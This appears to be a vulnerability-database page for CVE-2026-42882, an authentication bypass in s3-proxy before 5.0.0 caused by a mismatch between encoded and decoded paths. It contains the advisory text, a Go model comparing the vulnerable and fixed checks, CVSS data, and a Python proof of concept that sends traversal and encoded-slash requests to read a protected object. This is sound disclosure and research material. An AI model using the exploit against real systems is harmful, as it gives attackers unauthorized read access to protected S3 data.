Security Vulnerability Report
CVE-2026-42882 CVSS 9.4 CRITICAL

CVE-2026-42882

Published: 2026-05-11 20:25:44
Last Modified: 2026-05-11 20:25:44

Description

oxyno-zeta/s3-proxy is an AWS S3 proxy written in Go. Prior to 5.0.0, s3-proxy contains an authentication bypass caused by inconsistent URL path interpretation between the authentication middleware and the bucket handler. The authentication middleware evaluates resource path patterns against the percent-encoded request URI (r.URL.RequestURI()), while the bucket handler constructs S3 object keys from the decoded path (r.URL.Path). This mismatch, combined with the glob library being invoked without a path separator (so that * matches across / boundaries), allows unauthenticated attackers to write to, read from, or delete objects in protected S3 namespaces. Exploitation is possible via three techniques:

(1) * patterns that match across path separators, reaching protected routes via path traversal (e.g., /open/foo/drafts/../restricted/);
(2) percent-encoded slashes (%2F), which collapse several path segments into a single token at the auth layer while the decoded form resolves to a protected namespace at the storage layer;
(3) dot-dot segments (../) under ** prefix patterns, where the raw path matches an open route while Go's URL parser resolves the traversal to a protected path before the bucket handler runs.

An unauthenticated attacker with network access can perform unauthorized PUT, GET, or DELETE operations on objects in authentication-protected S3 namespaces. Assigned weaknesses are CWE-22 (path traversal) and CWE-863 (incorrect authorization). The underlying defect is that the authorization decision and the object key are derived from two different representations of the same request; when auditing similar proxies, verify that access control is evaluated on the same canonical (decoded, dot-segment-resolved) path the backend actually uses. This vulnerability is fixed in 5.0.0.
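The following Go program is an added example, not code from s3-proxy or from this advisory. It models the mismatch described above for all three techniques: the open-route policy (/public/* and /docs/**) is a constructed assumption rather than s3-proxy's configuration format, globToRegexp stands in for the project's glob library, and path.Clean over u.Path stands in for whatever server-side normalisation produces the object key (the page does not show that mechanism, so it is an assumption). Each request target is evaluated three ways: the pre-5.0.0 shape (glob over the encoded RequestURI with * crossing /), a separator-aware glob still over the encoded RequestURI (which closes technique 1 only), and a separator-aware glob over the same canonical key the handler uses.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"regexp"
	"strings"
)

// Constructed policy for this example (an assumption, not s3-proxy's
// configuration format): a request whose path matches an open pattern needs
// no credentials; everything else is protected.
var openPatterns = []string{"/public/*", "/docs/**"}

// globToRegexp compiles a glob. With separatorAware=false, "*" becomes ".*"
// and crosses "/" (the advisory's "glob library invoked without a path
// separator"). With separatorAware=true, "*" stops at "/" and only "**"
// spans segments.
func globToRegexp(pattern string, separatorAware bool) *regexp.Regexp {
	var sb strings.Builder
	sb.WriteString("^")
	for i := 0; i < len(pattern); i++ {
		switch {
		case strings.HasPrefix(pattern[i:], "**"):
			sb.WriteString(".*")
			i++ // consume the second '*'
		case pattern[i] == '*' && separatorAware:
			sb.WriteString("[^/]*")
		case pattern[i] == '*':
			sb.WriteString(".*")
		default:
			sb.WriteString(regexp.QuoteMeta(pattern[i : i+1]))
		}
	}
	sb.WriteString("$")
	return regexp.MustCompile(sb.String())
}

// matchesOpen reports whether target matches any open pattern.
func matchesOpen(target string, separatorAware bool) bool {
	for _, p := range openPatterns {
		if globToRegexp(p, separatorAware).MatchString(target) {
			return true
		}
	}
	return false
}

// objectKey models how the bucket handler derives the S3 key: from the
// decoded u.Path with dot segments resolved. path.Clean is an assumption
// standing in for the server-side normalisation, which the advisory does
// not show.
func objectKey(u *url.URL) string {
	return path.Clean(u.Path)
}

// Decision records what each layer sees for one raw request target.
type Decision struct {
	RawURI string // what the pre-5.0.0 auth middleware matched against
	Key    string // what the bucket handler actually reads or writes
	// Pre-5.0.0 shape: glob over the encoded RequestURI, "*" crossing "/".
	OpenVulnerable bool
	// Separator-aware glob, still over the encoded RequestURI.
	OpenRawSeparatorAware bool
	// Separator-aware glob over the same canonical key the handler uses.
	OpenFixed bool
}

// evaluate parses a raw request target exactly as a Go server would and
// applies the three checks to it.
func evaluate(rawTarget string) (Decision, error) {
	u, err := url.ParseRequestURI(rawTarget)
	if err != nil {
		return Decision{}, err
	}
	d := Decision{RawURI: u.RequestURI(), Key: objectKey(u)}
	d.OpenVulnerable = matchesOpen(d.RawURI, false)
	d.OpenRawSeparatorAware = matchesOpen(d.RawURI, true)
	d.OpenFixed = matchesOpen(d.Key, true)
	return d, nil
}

func main() {
	// Constructed request targets, one per technique in the advisory.
	for _, t := range []string{
		"/public/readme.txt",                // legitimate open request
		"/public/../private/secret.txt",     // (1) "*" crosses "/"
		"/public/..%2Fprivate%2Fsecret.txt", // (2) %2F collapses segments
		"/docs/../private/secret.txt",       // (3) "../" under a "**" prefix
	} {
		d, err := evaluate(t)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("%-36s key=%-22s vuln=%-5t rawSep=%-5t fixed=%t\n",
			d.RawURI, d.Key, d.OpenVulnerable, d.OpenRawSeparatorAware, d.OpenFixed)
	}
}
```

Running it shows that the three bypass targets all resolve to the key /private/secret.txt while the vulnerable check admits each of them; making the glob separator-aware stops technique 1 but not the %2F token (technique 2) or the ** prefix (technique 3), and only evaluating the policy against the handler's own canonical key denies all three while still admitting /public/readme.txt.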

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No CPE configuration data is available yet (NVD status: Received). Affected range per the advisory:

oxyno-zeta/s3-proxy < 5.0.0 (fixed in 5.0.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import http.client
import sys
from urllib.parse import urlsplit

# CVE-2026-42882 PoC: authentication bypass via path traversal / percent-encoding.
# Target: a vulnerable s3-proxy (< 5.0.0) instance.
# Exploits the mismatch between the percent-encoded request URI (auth middleware)
# and the decoded path (bucket handler). Route names below are assumptions:
# "/public/*" is an open route, "/admin/" is a protected namespace.
target = "http://vulnerable-s3-proxy:8080"


def send(method, raw_path, body=None):
    # The request-target must reach the server byte-for-byte. requests/urllib3
    # normalise dot segments ("..") client-side, which would collapse the
    # traversal payload before it is sent; http.client sends the path verbatim.
    u = urlsplit(target)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request(method, raw_path, body=body)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


# Baseline: the protected object must be denied when requested directly,
# otherwise a later 200 proves nothing about the bypass.
status, _ = send("GET", "/admin/config.json")
print(f"[*] Baseline GET /admin/config.json -> {status}")
if status == 200:
    sys.exit("[-] Target does not protect /admin/; nothing to bypass")

payloads = {
    # Technique 1: "*" matches across "/", so "/public/*" covers the raw URI
    # while the handler resolves the traversal to /admin/config.json.
    "traversal": "/public/../admin/config.json",
    # Technique 2: %2F keeps "..%2Fadmin%2Fconfig.json" a single token for the
    # glob at the auth layer; the decoded path is /public/../admin/config.json,
    # which resolves to /admin/config.json at the storage layer.
    "encoded-slash": "/public/..%2Fadmin%2Fconfig.json",
}

for name, raw_path in payloads.items():
    print(f"[*] Attempting {name}: {target}{raw_path}")
    status, data = send("GET", raw_path)
    if status == 200:
        print(f"[+] Success! Data leaked: {data[:100]!r}")
    else:
        print(f"[-] Failed with status: {status}")

References

https://github.com/oxyno-zeta/s3-proxy/security/advisories/GHSA-rfgq-wgg8-662p
https://github.com/oxyno-zeta/s3-proxy/commit/1320e4abd46ad18c2851fedde50dbb79df8b7a51
https://github.com/oxyno-zeta/s3-proxy/commit/af5ff57d8c6022459495b8fb50130073bca7b48a

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42882", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.450", "lastModified": "2026-05-11T20:25:44.450", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "oxyno-zeta/s3-proxy is an aws s3 proxy written in go. Prior to 5.0.0, s3-proxy contains an authentication bypass caused by inconsistent URL path interpretation between the authentication middleware and the bucket handler. The authentication middleware evaluates resource path patterns against the percent-encoded request URI (r.URL.RequestURI()), while the bucket handler constructs S3 object keys from the decoded path (r.URL.Path). This mismatch, combined with the glob library being invoked without a path separator (causing * to match across / boundaries), allows unauthenticated attackers to write to, read from, or delete objects in protected S3 namespaces. Exploitation is possible via three techniques: (1) using * patterns\nthat match across path separators to reach protected routes via path traversal (e.g., /open/foo/drafts/../restricted/), (2) using percent-encoded slashes (%2F) to collapse multiple path segments into a single token at the auth layer while the decoded form resolves to a protected namespace at the storage layer, and (3) using dot-dot segments (../) under ** prefix patterns, where the raw path matches an open route while Go's URL parser resolves the traversal to a protected path before the bucket handler runs. An unauthenticated attacker with network access can perform unauthorized PUT, GET, or DELETE operations on objects in authentication-protected S3 namespaces. 
This vulnerability is fixed in 5.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/oxyno-zeta/s3-proxy/commit/1320e4abd46ad18c2851fedde50dbb79df8b7a51", "source": "[email protected]"}, {"url": "https://github.com/oxyno-zeta/s3-proxy/commit/af5ff57d8c6022459495b8fb50130073bca7b48a", "source": "[email protected]"}, {"url": "https://github.com/oxyno-zeta/s3-proxy/security/advisories/GHSA-rfgq-wgg8-662p", "source": "[email protected]"}]}}